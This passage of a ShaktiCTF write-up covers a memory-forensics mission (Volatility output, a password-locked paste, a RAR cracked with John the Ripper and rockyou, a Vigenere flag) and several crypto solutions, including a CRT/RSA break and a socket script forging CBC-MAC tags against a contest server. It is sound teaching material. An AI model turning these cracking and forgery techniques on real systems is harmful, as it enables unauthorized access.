WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk=

C:\Users\TroubleMaker\Documents>type hint.txt
p4sSworD@51073#912

C:\Users\TroubleMaker\Documents>echo WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk=
WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk=

C:\Users\TroubleMaker\Documents>type hint.txt
The system cannot find the file specified.

C:\Users\TroubleMaker\Documents>
**************************************************
ConsoleProcess: conhost.exe Pid: 2012
Console: 0xffd46200 CommandHistorySize: 50 HistoryBufferCount: 1 HistoryBufferMax: 4
OriginalTitle: C:\Users\TroubleMaker\Desktop\DumpIt\DumpIt.exe
Title: C:\Users\TroubleMaker\Desktop\DumpIt\DumpIt.exe
AttachedProcess: DumpIt.exe Pid: 636 Handle: 0x60
----
CommandHistory: 0xbeba0 Application: DumpIt.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x60
----
Screen 0xa1190 X:80 Y:300
Dump:
DumpIt - v1.3.2.20110401 - One click memory memory dumper
Copyright (c) 2007 - 2011, Matthieu Suiche <http://www.msuiche.net>
Copyright (c) 2010 - 2011, MoonSols <http://www.moonsols.com>

Address space size:        4831838208 bytes (   4608 Mb)
Free space size:          14847827968 bytes (  14159 Mb)

* Destination = \??\C:\Users\TroubleMaker\Desktop\DumpIt\TROUBLEMAKER-PC-202
21208-200537.raw

--> Are you sure you want to continue? [y/n] y
+ Processing...
```
There is a base64 string in the command history, so decode it.

```
$ echo WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk= | base64 -d
You might need this - victory
```

It is not yet clear where this is used, so set it aside for now.

```
$ volatility -f Challenge.raw --profile=Win7SP1x64 iehistory
Volatility Foundation Volatility Framework 2.6
**************************************************
Process: 2728 iexplore.exe
Cache type "DEST" at 0x51887eb
Last modified: 2022-12-09 01:35:05 UTC+0000
Last accessed: 2022-12-08 20:05:05 UTC+0000
URL: TroubleMaker@https://pastebin.com/VPSQgu4v
Title: Pastebin.com - Locked Paste
```

Opening https://pastebin.com/VPSQgu4v requires a password. The consoles output above already showed that hint.txt contained the following password.
p4sSworD@51073#912
Entering this password displays the following.
Are you looking for this? https://mega.nz/file/ImYVDIaK#PcatBviUVQVh1srQVjYYgMNg8ikOfOcQ1DYaA_YKwFQ
Opening this URL downloads file.rar. The archive is password protected, so crack it with John the Ripper.

```
$ rar2john file.rar > hash.txt
$ john --wordlist=dict/rockyou.txt hash.txt --rules
Using default input encoding: UTF-8
Loaded 1 password hash (RAR5 [PBKDF2-SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
londonbridge     (file.rar)
1g 0:00:02:18 DONE (2022-12-10 08:16) 0.007235g/s 765.4p/s 765.4c/s 765.4C/s lowrider13..locuas
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

The password is londonbridge (the same as TroubleMaker's account password from Mission 1), so extract the archive.

```
$ unrar x -plondonbridge file.rar

UNRAR 6.11 beta 1 freeware      Copyright (c) 1993-2022 Alexander Roshal

Extracting from file.rar

Password of the RAR file is the password of TroubleMaker's account...

Extracting  flag.txt                                                  OK
All OK
$ cat flag.txt
npcdhzaon{a4Rmp!_K1N5q0p_4vQfKkT1uA3R}
```

Guessing a Vigenere cipher, decrypt it at https://www.dcode.fr/vigenere-cipher. The key is "victory", the decoded base64 string from the consoles output.
shaktictf{y4Yyy!_M1S5i0n_4cCoMpL1sH3D}
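The final two steps of Mission 2 reproduced offline, as an added example that is not part of the writeup: the key is taken from the decoded console echo, and the Vigenere decryption assumes the dcode.fr convention that non-letters stay in place without consuming a key letter.

```python
import base64

# Constructed example: key recovery from the console echo, then Vigenere
# decryption of the text found in file.rar (both values are from the writeup).
ECHOED = "WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk="
RAR_FLAG = "npcdhzaon{a4Rmp!_K1N5q0p_4vQfKkT1uA3R}"


def key_from_echo(b64: str) -> str:
    """Decode the echoed base64 and use its last word as the Vigenere key."""
    text = base64.b64decode(b64).decode()
    return text.split()[-1].lower()


def vigenere_decrypt(ct: str, key: str) -> str:
    """Subtract the key letter from each letter of ct, preserving case.
    Digits and punctuation pass through and do not advance the key."""
    out, k = [], 0
    for ch in ct:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[k % len(key)]) - ord("a")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)


def solve() -> str:
    return vigenere_decrypt(RAR_FLAG, key_from_echo(ECHOED))


if __name__ == "__main__":
    print("key :", key_from_echo(ECHOED))
    print("flag:", solve())
```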
Eazy_peaZy (Crypto 50)
Base64-decode the ciphertext, then add 15 to the ASCII code of each byte to recover the plaintext.

```python
#!/usr/bin/env python3
from base64 import b64decode

ct = b'ZFlSXGVaVGVXbFRjamFlIVAiZFBkZmEkY1BWUmtqampqampQWFQlJCNlYyYnWCVlYyYlbg=='
# Each plaintext byte was shifted down by 15 before base64 encoding; undo it.
flag = ''.join([chr(c + 15) for c in b64decode(ct)])
print(flag)
```
shaktictf{crypt0_1s_sup3r_eazyyyyyy_gc432tr56g4tr54}
secRets_And_seCReTs (Cryptography 100)
Overview of the encryption:

・n: array of three known integers
・c: array of three known integers
・x % n[0] == c[0] holds
・x % n[1] == c[1] holds
・x % n[2] == c[2] holds
・secret: known constant
・e = 65537 (known)
・ct: known constant
・pow(ct, d, secret//x) == the flag as an integer holds

x can be recovered with the CRT.

Let n = secret // x and factor n with factordb.

```
n = 156613782007770984536049055700840395037085682399926189984796410929143868636172989598027406051641994725886674336805075334390044528511942285958708618671006005927130990180083143883853840126990685118290412751594654157367930730824790742241421921147161987915110899307344903473712967071752529319870067482601269289159 ** 2 = p ** 2
```

Since n is the square of a prime, phi takes the following value (not (p - 1) ** 2); after that the decryption is ordinary RSA.

```
phi = p * (p - 1)
```
```python
#!/usr/bin/env python3
from Crypto.Util.number import inverse, long_to_bytes
from sympy.ntheory.modular import crt

n = [8722540009234070247614687250654407242443098960521889927638169603994447523278398949052234586867149142397946752296113268097476897402751079151430185069380019, 7748390830619438628598461672002256107736202041283980575594114738792667049612675190299231384130518428001436332199784230830361296805998178862622627821106411, 12992001107762284853924107072566691259373024612699267823574353409729296618405485466359139269067615966447864990530610158839653182793355847359198838835594411]
c = [1411653708282913345423368557671871591664438381629501903851153161454445916121359905705692712233369895756996170441640578174610106571066191790012378520429743, 2861865990314714540093636102814256470323315183310888629544832686169355957218120916189696143602437816851535307621641620697566853687152831782355649417978952, 376492284239858752271882252381292364517711829294783943816555345285629896042539317245807593032505251819708007746820040182429681780320868266166620015593930]
secret = 4302040125834928853558463909476079954473400865172251180160558435767130753932883186010390855112227834689861010095690778866857294344059634143100709544931839088413113732983879851609646261868420370506958223094475800449942079286436722629516277911423054845515342792094987249059810059640127872352101234638506603087565277395480953387647118861450659688484283820336767116038031727190397533082113134466893728210621302098082671125283992902107359805546865262918787687109747546968842757321383287635483017116189825332578143804402313162547301864633478350112638450973130720295084401400762328157586821639409421465548080122760881528019152451981418066119560584988658928643613995792058313513615847754001837873387949017975912403754727304537758597079167674369192909953480861392310713676253433998929652777155332408050107725317676660176980502406301244129743702460065671633250603271650634176695472477451658931634382635748322647891956353158570635160043
e = 65537
ct = 16958627479063955348415964384163116282602743039742753852934410863378528486785270030162782732192537726709536924276654783411884139339994697205619239406660459997082991141519385345070967253589282293949945894128620519748508028990727998488399564805026414462500253524261007024303476629172149332624303860869360966809845919057766279471870925180603362418449119409436609700813481467972962774900963043970140554494187496533636616384537667808308555402187685194879588448942654070984762583024927082993513125305565020701004973206532961944433936049713847420474363949095844995122469523084865481364653146506752587869477287886906616275417

# Recover x from the three congruences, then n = secret // x.
x, _ = crt(n, c)
n = secret // x
print('[+] n =', n)

# factordb: n is a perfect square of this prime.
p = 156613782007770984536049055700840395037085682399926189984796410929143868636172989598027406051641994725886674336805075334390044528511942285958708618671006005927130990180083143883853840126990685118290412751594654157367930730824790742241421921147161987915110899307344903473712967071752529319870067482601269289159
assert n == p ** 2

# Euler's totient of p**2 is p*(p-1).
phi = p * (p - 1)
d = inverse(e, phi)
m = pow(ct, d, n)
flag = long_to_bytes(m).decode()
print('[*] flag:', flag)
```

The output:

```
[+] n = 24527876714777610556168704102334063247745307067942987179946992203143782911214218738693269763284353107444558551004104842495208613554362680493609315262323088218069305109094883023250460622553819850578030167910933028392613333549556209547555445147475324578694902644739395420556980677634640744378713609298141891560253460328397733071122264628468706243972435551492706426936176969047044900758569383152320313902601091822535952698142154712130550473808314533625099780507036524949344974327532792045713711551245809959038345909568860198589805752319051021759477458800632328558389734253607892450861044270982742648526813361769154927281
[*] flag: shaktictf{w0w_you_kn0w_h0w_RSA_&_CRT_w0rks_!}
```
shaktictf{w0w_you_kn0w_h0w_RSA_&_CRT_w0rks_!}
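The same construction with small numbers, as an added example that is not the writeup's solver, so that every step (CRT, the square modulus, phi = p*(p-1)) can be checked by hand. The moduli, x, p and the message are constructed; no external libraries are needed.

```python
from math import isqrt

# Constructed example: secRets_And_seCReTs with toy-sized parameters.


def crt(moduli, residues) -> int:
    """Garner-style CRT for pairwise coprime moduli: x == residues[i] (mod moduli[i])."""
    x, m = 0, 1
    for n_i, c_i in zip(moduli, residues):
        t = ((c_i - x) * pow(m, -1, n_i)) % n_i
        x += m * t
        m *= n_i
    return x % m


def make_challenge(p: int, x: int, moduli, m: int, e: int = 65537):
    """Mimic the server: publish (n_i, c_i), secret = x * p**2, and ct = m^e mod p**2."""
    residues = [x % n_i for n_i in moduli]
    n = p * p
    return moduli, residues, x * n, pow(m, e, n)


def solve(moduli, residues, secret: int, ct: int, e: int = 65537) -> int:
    x = crt(moduli, residues)          # step 1: x from the three congruences
    n = secret // x                    # step 2: the RSA modulus
    p = isqrt(n)
    assert p * p == n, "n is not a perfect square"
    phi = p * (p - 1)                  # step 3: Euler phi of p**2 (not (p-1)**2)
    d = pow(e, -1, phi)
    return pow(ct, d, n)               # step 4: ordinary RSA decryption


def demo() -> tuple:
    """Return (original message, recovered message) for the toy parameters."""
    p = 1000003                        # prime (constructed)
    moduli = [101, 103, 107]           # pairwise coprime (constructed)
    x = 123456                         # < 101*103*107, so the CRT solution is unique
    m = int.from_bytes(b"CRT!", "big") # must be < p**2 and coprime to p
    params = make_challenge(p, x, moduli, m)
    return m, solve(*params)


if __name__ == "__main__":
    m, recovered = demo()
    print(recovered.to_bytes(4, "big"), recovered == m)
```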
cAex0r (Cryptography 100)
Overview of the encryption:

・stride: random integer between 1 and 27 inclusive
・s1: first half of the flag
・s2: second half of the flag
・key: 3 random bytes
・cass(s1+s2, stride)
  ・each character of s1+s2 is transformed as follows and the results concatenated:
    ・ASCII 65..90: subtract stride, take the remainder mod 26, use it as an index into the uppercase alphabet
    ・ASCII 97..122: subtract stride, take the remainder mod 26, use it as an index into the lowercase alphabet
    ・anything else is left unchanged
・c: XOR of key with the result above → written to a file

Brute-force stride; for each candidate, derive the 3-byte key from the assumption that the flag starts with "sha", and decrypt with it.

```python
#!/usr/bin/env python3
from pwn import xor


def is_printable(s):
    for c in s:
        if ord(c) < 32 or ord(c) > 126:
            return False
    return True


u_alpha = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
l_alpha = 'abcdefghijklmnopqrstuvwxyz'
flag_head = b'sha'

with open('ciphertext_15c434ca-401e-4497-b782-53050680758d.txt', 'rb') as f:
    c = f.read()

for stride in range(1, 28):
    # How the known prefix "sha" looks after the Caesar step with this stride.
    enc_flag_head = ''
    for i in flag_head:
        enc_flag_head += l_alpha[(l_alpha.find(chr(i)) - stride) % 26]
    # The key repeats every 3 bytes, so the first 3 ciphertext bytes reveal it.
    key = xor(enc_flag_head.encode(), c[:3])
    ct = xor(c, key)
    # Undo the Caesar step.
    flag = ''
    for i in ct:
        if i >= 65 and i <= 90:
            flag += u_alpha[(u_alpha.find(chr(i)) + stride) % 26]
        elif i >= 97 and i <= 122:
            flag += l_alpha[(l_alpha.find(chr(i)) + stride) % 26]
        else:
            flag += chr(i)
    if is_printable(flag) and flag.endswith('}'):
        print(flag)
        break
```
shaktictf{welCom3_t0_cRyptOo_WoRLD_77846b12bfd9b91ebce67b236aa4}
d0uble_cbc (Cryptography 200)
サーバの処理概要は以下の通り。
・op: メニュー選択 ・opが1の場合 ・pt: 入力(16進文字列) ・ct: ptをhexデコードした後、AES-CBC暗号化したものを16進表記で表示 ・opが2の場合 ・ct: 入力(16進文字列) ・pt: ctをhexデコードした後、AES-CBC復号したものを16進表記で表示 ・opが3の場合 ・iv_detected: 入力(16進文字列) ・verify_iv: ivの16進文字列とiv_detectedが一致していたらTrue、そうでない場合はFalse ・verify_iv表示 ・verify_ivがTrueの場合 ・iv_detected: iv_detectedのhexデコード ・x: 入力 ・xが'0'の場合 ・msg: 入力(16進文字列)をhexデコード ・x = sign(iv_detected, key, msg) ・messageblocks: msgの16バイトごとの配列 ・tag: 最後のブロックの暗号 ・tagの16進表記を返却 ・xを表示 ・xが'1'の場合 ・msg1: 入力(16進文字列)をhexデコード ・msg2: 入力(16進文字列)をhexデコード ・msg1とmsg2が同じ場合、NG ・msg1とmsg2が異なり、signが同じ場合、フラグを表示 ・opが4の場合、終了
Plaintext block 1 (P1) ^ iv --(AES encrypt)--> ciphertext block 1 (C1)
Plaintext block 2 (P2) ^ C1 --(AES encrypt)--> ciphertext block 2 (C2)
With this in mind, encrypt an arbitrary plaintext of fewer than 16 bytes (a single block after padding).
P1 ^ iv --(AES encrypt)--> C1
Next, decrypt C1 + C1.
C1 --(AES decrypt)--> P1 ^ iv
C1 --(AES decrypt)--> P2 ^ C1
Since P1 ^ iv = P2 ^ C1, iv is obtained as follows.
iv = (P2 ^ C1) ^ P1
We need to supply two different plaintexts whose last ciphertext block is the same.
Plaintext block 1 (P1) ^ iv --(AES encrypt)--> ciphertext block 1 (C1)
Plaintext block 2 (P2) ^ C1 --(AES encrypt)--> ciphertext block 2 (C2)
Thinking about it again with the picture above, encrypt an arbitrary 16-byte plaintext.
P1 ^ iv --(AES encrypt)--> C1
If we supply a second message whose first block is the same P1 and whose second block is P2 = P1 ^ iv ^ C1, it is encrypted as follows.
P1 ^ iv --(AES encrypt)--> C1
P2 ^ C1 = P1 ^ iv --(AES encrypt)--> C1
Both end with ciphertext block C1, so they yield the same tag (signature).
#!/usr/bin/env python3
import socket
from Crypto.Util.Padding import pad
from Crypto.Util.strxor import strxor

def recvuntil(s, tail):
    data = b''
    while True:
        if tail in data:
            return data.decode()
        data += s.recv(1)

host = '65.2.136.80'
port = 30060

# 1st connection: encrypt a short plaintext to obtain C1
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

data = recvuntil(s, b'exit\n').rstrip()
print(data)

pt = b'ABC'
h_pt = pt.hex()

print('1')
s.sendall(b'1\n')
data = recvuntil(s, b'format\n').rstrip()
print(data)
data = recvuntil(s, b'\n').rstrip()
print(data)
print(h_pt)
s.sendall(h_pt.encode() + b'\n')
data = recvuntil(s, b'\n').rstrip()
print(data)
ct = bytes.fromhex(data.split(' ')[-1])
s.close()

# 2nd connection: decrypt C1 || C1 and recover iv from the second block
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

data = recvuntil(s, b'exit\n').rstrip()
print(data)

ct2 = ct + ct
h_ct2 = ct2.hex()

print('2')
s.sendall(b'2\n')
data = recvuntil(s, b'decrypt\n').rstrip()
print(data)
print(h_ct2)
s.sendall(h_ct2.encode() + b'\n')
data = recvuntil(s, b'\n').rstrip()
print(data)
pt2 = bytes.fromhex(data.split(' ')[-1])
iv = strxor(strxor(pt2[16:], ct), pad(pt, 16))
h_iv = iv.hex()
print('[+] iv:', iv.decode())
s.close()

# 3rd connection: feed iv, get the tag (C1) for a one-block message
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

data = recvuntil(s, b'exit\n').rstrip()
print(data)

pt = b'0123456789abcdef'
h_pt = pt.hex()

print('3')
s.sendall(b'3\n')
data = recvuntil(s, b'\n').rstrip()
print(data)
print(h_iv)
s.sendall(h_iv.encode() + b'\n')
data = recvuntil(s, b'messages\n').rstrip()
print(data)
print('0')
s.sendall(b'0\n')
data = recvuntil(s, b'\n').rstrip()
print(data)
data = recvuntil(s, b'\n').rstrip()
print(data)
print(h_pt)
s.sendall(h_pt.encode() + b'\n')
data = recvuntil(s, b'message\n').rstrip()
print(data)
data = recvuntil(s, b'\n').rstrip()
print(data)
c1 = bytes.fromhex(data)
# second message: P1 || (P1 ^ iv ^ C1), whose last ciphertext block is C1 again
pt2 = pt + strxor(strxor(pt, iv), c1)
h_pt2 = pt2.hex()
s.close()

# 4th connection: submit the two different messages with the same tag
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

data = recvuntil(s, b'exit\n').rstrip()
print(data)
print('3')
s.sendall(b'3\n')
data = recvuntil(s, b'\n').rstrip()
print(data)
print(h_iv)
s.sendall(h_iv.encode() + b'\n')
data = recvuntil(s, b'messages\n').rstrip()
print(data)
print('1')
s.sendall(b'1\n')
data = recvuntil(s, b': \n').rstrip()
print(data)
print(h_pt)
s.sendall(h_pt.encode() + b'\n')
data = recvuntil(s, b': \n').rstrip()
print(data)
print(h_pt2)
s.sendall(h_pt2.encode() + b'\n')
data = recvuntil(s, b'\n').rstrip()
print(data)
s.close()
The output of running it is as follows.
******************************Welcome to the john's CBC server************************
You really wanna get into the system? then search for IV
Choose 1 option among four
1.Encrypt the plain text
2.Decrypt the ciphertext
3.feed IV
4.exit
1
I will provide the encrypted text for you
Input the plaintext in hex format
414243
cipher text for provided 60893f316b9e68c2eab9872a09923e15
******************************Welcome to the john's CBC server************************
You really wanna get into the system? then search for IV
Choose 1 option among four
1.Encrypt the plain text
2.Decrypt the ciphertext
3.feed IV
4.exit
2
I will provide the reasonable plaintext for you
Input the cipher text in bytes to decrypt
60893f316b9e68c2eab9872a09923e1560893f316b9e68c2eab9872a09923e15
decrypted text for provided 4142430d0d0d0d0d0d0d0d0d0d0d0d0d6094145d16e31c9084d6e97869f0577d
[+] iv: A_happy_cbc_mode
******************************Welcome to the john's CBC server************************
You really wanna get into the system? then search for IV
Choose 1 option among four
1.Encrypt the plain text
2.Decrypt the ciphertext
3.feed IV
4.exit
3
Provide reasonable IV to proceed further
415f68617070795f6362635f6d6f6465
Yooo... you are going good, move forward with some more courage
True
Let me see whether you are worth enough to gain my gold coins. To prove yourself, give me two different hex-encoded messages that could sign to the same tag.
Now press '0' to get your hex inputs signed and press 1 to submit two same messages
0
Input hash encoded message:
30313233343536373839616263646566
Tag for your message
7d4d21e02235e1fd646b36e147970d7c
******************************Welcome to the john's CBC server************************
You really wanna get into the system? then search for IV
Choose 1 option among four
1.Encrypt the plain text
2.Decrypt the ciphertext
3.feed IV
4.exit
3
Provide reasonable IV to proceed further
415f68617070795f6362635f6d6f6465
Yooo... you are going good, move forward with some more courage
True
Let me see whether you are worth enough to gain my gold coins. To prove yourself, give me two different hex-encoded messages that could sign to the same tag.
Now press '0' to get your hex inputs signed and press 1 to submit two same messages
1
Message #1:
30313233343536373839616263646566
Message #2:
303132333435363738396162636465660c237bb26670ae953f3034dc499c0c7f
b'shaktictf{double_cheese_double_mac_yummyyyy_4120686170707920636263206d6f6465}'
shaktictf{double_cheese_double_mac_yummyyyy_4120686170707920636263206d6f6465}